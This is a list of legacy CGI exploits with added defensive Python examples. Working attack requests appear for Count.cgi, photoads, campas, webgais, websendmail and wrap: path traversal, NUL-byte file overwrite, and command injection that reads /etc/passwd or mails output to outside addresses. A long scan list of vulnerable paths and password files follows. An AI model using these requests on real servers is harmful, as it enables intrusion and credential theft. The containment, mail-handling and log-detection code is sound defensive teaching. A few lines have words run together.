
● Count.cgi
Viewing an image with Count.cgi:
http://server/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif
● finger.cgi
lynx http://www.server/cgi-bin/finger?@localhost
Returns the names of the users logged in on the host.
● JFS
Vulnerability description: break into the host through the photoads CGI module; the PCWEEK-LINUX host can be compromised this way, as follows:
lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%0a11111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=
0&CityStPhone=0&Renewed=0"
After creating a new Ad entry to bypass the $AdNum check, use:
lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111&DataFile=
1&Password=0&FILE_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif"
Creates or overwrites any file that the user nobody is allowed to write.
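Both the Count.cgi request and the photo.cgi request above work because the script joins an attacker-controlled name onto a directory and opens the result; `../` climbs out of the directory and `%00` (a NUL byte) makes the C library stop reading the name before the `.gif` suffix that the script checked. The following is an added example, not code from the original text or from either CGI package: a containment check a defender would put in front of any such file access. The document root `/var/www/images` and the parameter names are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the example (not a path from the original text).
IMAGE_ROOT = "/var/www/images"


def resolve_under_root(root, raw_param):
    """Map a percent-encoded CGI parameter such as Count.cgi's `image=` or
    photo.cgi's `FILE_NAME=` to a filesystem path, or return None when the
    value would escape `root`.

    Rejections, in order:
      * a NUL byte after decoding (the `%00.gif` trick: C code stops at the
        NUL and opens a different file than the checked extension suggests);
      * backslashes, which some servers treat as separators (`/lala/\..`);
      * an empty name, which would otherwise resolve to the root itself;
      * any lexically normalised path outside `root` (`../../../etc/passwd`).
    """
    requested = unquote(raw_param)  # decode exactly once, never in a loop
    if "\x00" in requested or "\\" in requested:
        return None
    relative = requested.lstrip("/")
    if not relative:
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    # Prefix test with the trailing "/" so that "/var/www/images_old" does
    # not count as being inside "/var/www/images", and "." resolves to the
    # root itself and is refused.
    if not candidate.startswith(root_norm + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for value in ("cats/one.gif",
                  "../../../../../../path_to_gif/file.gif",
                  "/lala/%5C../../../../home/httpd/x.cgi%00.gif"):
        print(repr(value), "->", resolve_under_root(IMAGE_ROOT, value))
```

The check is purely lexical so that it runs anywhere; on a live server, call `os.path.realpath` on the returned path and repeat the prefix test before opening the file, so that a symbolic link inside the image directory cannot point back out of it.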
● visadmin.exe
http://server/cgi-bin/visadmin.exe?user=guest
This request makes the server keep writing to its hard disk until the disk is full.
● campas
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
● webgais
query='';mail+foo@somewhere.net
telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query='';mail+drazvan\@pop3.kappa.roparagraph
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a
&content=a
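The campas, webgais and websendmail requests above share one defect: a parameter (`query=`, `receiver=`) is pasted into a command string that a shell runs, so a `;` or an encoded newline (`%0a`) ends the intended command and starts the attacker's. The following is an added example, not code from any of those packages: the input handling a defender would use instead, an allowlist for the recipient and an argv list rather than a shell string. The mail program path `/usr/bin/mail` is an assumption.

```python
import re
import subprocess

# Allowlist for one mailbox: first character alphanumeric (so the value can
# never be parsed as an option such as -f), no shell metacharacters, no
# whitespace or control characters anywhere.
_RECIPIENT_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,}")

# Assumed mail program path for the example.
MAIL_PROGRAM = "/usr/bin/mail"


def is_safe_recipient(addr):
    """True only if `addr` is a single, plain mailbox address."""
    return _RECIPIENT_RE.fullmatch(addr) is not None


def build_mail_argv(recipient, subject):
    """Return the argv list for the mail program, or None if input is rejected.

    Because the command is an argv list and never a shell string, characters
    like ';', '|', '`' or a newline inside `subject` reach the mail program
    as data; they cannot end the command the way the `query=` and
    `receiver=` parameters above did.
    """
    if not is_safe_recipient(recipient):
        return None
    if len(subject) > 200 or any(ord(ch) < 32 or ch == "\x7f" for ch in subject):
        return None  # CR/LF here would inject extra mail headers
    return [MAIL_PROGRAM, "-s", subject, recipient]


def send_mail(recipient, subject, body):
    """Validate, then run the mail program without a shell."""
    argv = build_mail_argv(recipient, subject)
    if argv is None:
        raise ValueError("rejected recipient or subject")
    return subprocess.run(argv, input=body.encode(), check=True, shell=False)


if __name__ == "__main__":
    for addr in ("user@example.org", ";mail+x@example.org", "-f@example.org"):
        print(repr(addr), "accepted" if is_safe_recipient(addr) else "rejected")
```

The order of the argv list matters as much as the absence of a shell: the recipient comes last and can never start with `-`, so the mail program cannot mistake it for an option, which is the argument-injection variant of the same bug.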
● wrap
http://server/cgi-bin/wrap?/../../../../../etc
Vulnerability description: lists the files in the etc directory. Below are the names of all CGI programs that may contain vulnerabilities:
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SELECTOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
adminlogin?RCpage=/sysadmin/index.stm
/c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SELECTOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../
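The list above doubles as a detection signature: a request for one of these paths, or any request whose query carries the `%0a`, `%00`, `../` or `::$DATA` patterns seen in the exploits, is worth an alert regardless of whether the script is installed. The following is an added example, not part of the original list: a small classifier run over access-log lines in Common Log Format. The log lines are constructed for the example, and `PROBED_PATHS` holds only a subset of the list, chosen as an illustration; a real deployment would load the full list.

```python
import re
from urllib.parse import unquote

# Subset of the CGI names from the list above (exact, case-sensitive match).
PROBED_PATHS = {
    "/cgi-bin/phf", "/cgi-bin/Count.cgi", "/cgi-bin/campas", "/cgi-bin/webgais",
    "/cgi-bin/websendmail", "/cgi-bin/finger", "/cgi-bin/wrap",
    "/cgi-bin/visadmin.exe", "/cgi-bin/whois_raw.cgi",
    "/_vti_pvt/users.pwd", "/_vti_pvt/administrators.pwd", "/_vti_pvt/service.pwd",
    "/msadc/Samples/SELECTOR/showcode.asp",
    "/iissamples/exair/howitworks/codebrws.asp",
    "/cfdocs/expeval/openfile.cfm",
}

# Common Log Format: host ident user [time] "METHOD target [HTTP/x]" status bytes
_CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Raw (still percent-encoded) patterns used by the exploits on this page.
_INJECTION = re.compile(r"(\.\./|%00|%0a|%0d|::\$DATA|\|)", re.IGNORECASE)


def classify(line):
    """Parse one log line; return a dict with the reasons it is suspicious
    (empty list if none) or None if the line is not in CLF."""
    m = _CLF.match(line)
    if not m:
        return None
    host, _method, target, status = m.groups()
    path, _, _query = target.partition("?")
    reasons = []
    if path in PROBED_PATHS:
        reasons.append("known-vulnerable-cgi")
    decoded = unquote(target)  # catches %2e%2e%2f and friends as well
    if (_INJECTION.search(target) or "\n" in decoded or "\r" in decoded
            or "\x00" in decoded or "../" in decoded):
        reasons.append("injection-pattern")
    return {"host": host, "path": path, "status": status, "reasons": reasons}


def suspicious(lines):
    """Return the classified records for every line that raised a reason."""
    hits = []
    for line in lines:
        rec = classify(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


# Constructed sample log; the hosts, times and sizes are invented.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/1999:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [12/Mar/1999:10:01:05 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 200 512',
    '10.0.0.9 - - [12/Mar/1999:10:01:07 +0000] "GET /cgi-bin/Count.cgi?display=image&image=../../../../etc/passwd HTTP/1.0" 404 210',
    '10.0.0.9 - - [12/Mar/1999:10:01:09 +0000] "GET /_vti_pvt/users.pwd HTTP/1.0" 403 0',
    '10.0.0.12 - - [12/Mar/1999:10:02:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 3400',
]

if __name__ == "__main__":
    for rec in suspicious(SAMPLE_LOG):
        print(rec["host"], rec["status"], rec["path"], ",".join(rec["reasons"]))
```

Note that a 404 or 403 is still a hit: the third and fourth sample lines show a scanner walking the list, and the host that sends them is the thing to act on, not the individual response code. The injection test looks at the raw target and at the decoded one, because `../` may arrive either literally or as `%2e%2e%2f`.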